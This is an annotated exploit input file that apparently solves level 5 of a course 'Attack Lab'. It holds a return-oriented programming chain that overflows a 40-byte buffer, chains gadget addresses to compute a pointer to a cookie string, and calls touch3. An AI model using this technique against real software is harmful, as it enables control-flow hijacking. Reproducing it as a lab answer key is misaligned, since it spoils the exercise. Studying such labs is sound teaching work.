/* idea to solve level 5 was take from 
   https://github.com/codeKaren/Attack-Lab
   and this file contains solution from above link */
/* fill the buffer for the first 40 byte */
<10000>00 00 00 00 00 00 00 00  /* cookie as string */
<10008>00 00 00 00 00 00 00 00
<10010>00 00 00 00 00 00 00 00
<10018>00 00 00 00 00 00 00 00
<10020>00 00 00 00 00 00 00 00
/* end of buffer */
<10028>31 19 40 00 00 00 00 00 /* 48 89 e0 c3 	  : movq %rsp, %rax : %rax=0x10030*/
<10030>c2 19 40 00 00 00 00 00 /* 89 c1 90 c3 c3 : movl %eax, %ecx */
<10038>9c 19 40 00 00 00 00 00 /* 89 ca 90 c3 c3 : movl %ecx, %edx */
<10040>c9 19 40 00 00 00 00 00 /* 89 d6 c3 c3    : movl %edx, %esi  : %esi=0x10030*/
<10048>d5 18 40 00 00 00 00 00 /* 58 c3 c3	  : pop %rax	    : %rax=0x41   */
<10050>41 00 00 00 00 00 00 00  /* offset from rsp for the string 65 bytes*/ 
<10058>e7 18 40 00 00 00 00 00 /* 48 89 c7 c3 c3 : movq %rax, %rdi  : %rdi=0x41*/
<10060>07 19 40 00 00 00 00 00 /* 48 8d 04 37 c3 : lea (%rdi,%rsi,1),%rax : 0x10030+41=0x10071*/
<10068>e7 18 40 00 00 00 00 00 /* 48 89 c7 c3 c3 : movq %rax, %rdi    	   */
<10070>3c 18 40 00 00 00 00 00 /* touch3 function */
<10078>35 61 34 66 37 39 36 62 00 /* cookies string: 0xb697f4a5 */
